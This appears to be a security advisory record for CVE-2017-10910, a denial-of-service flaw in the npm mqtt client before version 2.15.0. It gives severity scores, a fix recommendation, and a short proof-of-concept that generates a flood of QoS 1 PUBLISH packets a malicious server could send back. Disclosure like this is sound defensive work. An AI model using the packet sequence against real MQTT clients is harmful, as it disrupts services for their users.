CVE-2017-10910 – mqtt
Package
Manager: npm
Name: mqtt
Vulnerable Version: >=2.0.0 <2.15.0
Severity
Level: Medium
CVSS v3.1: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS: 0.0079 pctl0.73001
Details
Denial of Service in mqtt Affected versions of `mqtt` do not properly handle PUBLISH packets returning from the server, leading to a Denial of Service condition. The vulnerability is completely mitigated if the only connected servers are trusted, guaranteed not to be under the control of a malicious actor. ## Proof of Concept The following is a demonstration of how to generate the malicious packet sequence, but does not include information on handling the initial network connections and MQTT overhead. ``` var mqttp = require('mqtt-packet'); var packets = []; for(var i=0; i<=1000;i++){ packets.push( mqttp.generate({ cmd:'publish', topic:Buffer.from('hello'), payload:Buffer.from('world'), retain: false, dup: false, messageId: ++i, qos: 1 }) ) } ``` ## Recommendation Update to version 2.15.0 or later.
Metadata
Created: 2017-12-28T22:51:58Z
Modified: 2021-09-14T17:16:40Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/12/GHSA-h9mj-fghc-664w/GHSA-h9mj-fghc-664w.json
CWE IDs: ["CWE-674"]
Alternative ID: GHSA-h9mj-fghc-664w
Finding: F067
Auto approve: 1